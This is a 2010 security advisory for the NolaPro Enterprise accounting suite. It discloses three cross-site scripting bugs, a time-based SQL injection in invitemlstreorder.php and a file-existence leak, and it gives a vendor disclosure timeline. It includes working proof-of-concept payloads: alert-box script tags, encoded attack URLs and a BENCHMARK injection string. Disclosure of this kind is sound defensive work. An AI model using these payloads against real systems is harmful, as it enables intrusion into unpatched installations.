NolaPro Enterprise 4.0.5538 Cross Site Scripting / SQL Injection

`Advisory : CORELAN-10-035  
Disclosure date : May 1st, 2010  
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-035  
  
00 : Vulnerability information  
  
Product : NolaPro Enterprise  
Version : 4.0.5538  
Vendor : Noguska LLC   
URL : http://www.nolapro.com  
Platform : Windows (PHP/MySQL)  
Type of vulnerabilities : SQL Injection, Cross-Site Scripting, Information Disclosure  
Risk rating : Medium  
Issue fixed in version : 4.0.5720   
Vulnerability discovered by : ekse  
Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/  
  
  
01 : Vendor description of software  
  
>From the vendor website:  
"NolaPro is a premium, completely free web-based accounting suite. It includes AP, AR,  
Payroll, Order Tracking, Inventory Control, POS, B2B, and an Ecom Shopping Cart."  
  
  
02 : Vulnerability details  
  
Corelan Team has found 3 types of vulnerabilities in NolaPro :  
- Cross-Site Scripting (XSS)  
- SQL Injection  
- Information Disclosure  
  
Cross-Site Scripting  
--------------------  
  
We have found 3 instances of Cross-Site Scripting in Nolapro, one of which does not   
require authentication. Please note that since Cross-Site Scripting is a client side  
attack, the need for authentication does not reduce the risk and is indicated sollely  
to facillitate reproducing the bugs.  
  
XSS #1  
Script: example.php Parameter: file Request: POST AuthRequired?: No  
  
XSS #2   
Script: sidemenu.php Parameter: menutitle Request: GET AuthRequired?: Yes  
  
XSS #3  
Script: nporderitemremote.php Parameter: linenum Request: GET AuthRequired?: Yes  
We provide proof-of-concept for these bugs. These examples are inoffensive and will only  
display an alert box in the browser.  
  
XSS #1  
Because this is a POST request, an easy way to reproduce the bug is to input the   
following string on the example.php page :  
  
<script>alert(String.fromCharCode(88,83,83,32,102,111,117,110,100,32,98,121,32,67,111,114,101,108,97,110,32,84,101,97,109));</script>  
  
XSS #2  
http://nolapro_server/sidemenu.php?index=1&menutitle=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,32,98,121,32,67,111,114,101,108,97,110,32,84,101,97,109%29%29;%3C/script%3E&menutitleorig=STR_ORDERS  
  
XSS #3  
http://nolapro_server/nporderitemremote.php?pos_mode=1&currency=USD&curdate=2010-04-12&linenum=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,32,98,121,32,67,111,114,101,108,97,110,32,84,101,97,109%29%29;%3C/script%3E&inventorylocationid=1&customerid=&shiptoid=0  
  
SQL Injection  
-------------  
We found one instance of SQL Injection in NolaPro. The vulnerable script is  
invitemlstreorder.php and the parameter is vendorid.  
To reproduce the bug, first input the value 1 on the invitemlstreorder.php page in the  
box for the ID value. The server should respond almost instantly. Now input the following   
value :  
  
1 or BENCHMARK(2500000,MD5(1))  
  
The server should take some time to respond (if the delay is too short, increase the   
2500000 value).  
  
Information Disclosure  
----------------------  
The checkfile.php script gives indication on the existence of files on the server. This  
information could be used by an attacker to gain information on the server and perform a  
targeted attack. Access to this script should require authentication and be accessible to  
administrators only.  
  
03 : Vendor communication  
  
april 18th 2010 : vendor contacted  
april 19th 2010 : vendor replied  
april 21th 2010 : new version available  
may 1st 2010 : public disclosure  
  
Corelan Team wants to thank Noguska for their great response and handling of the issues  
disclosed.  
`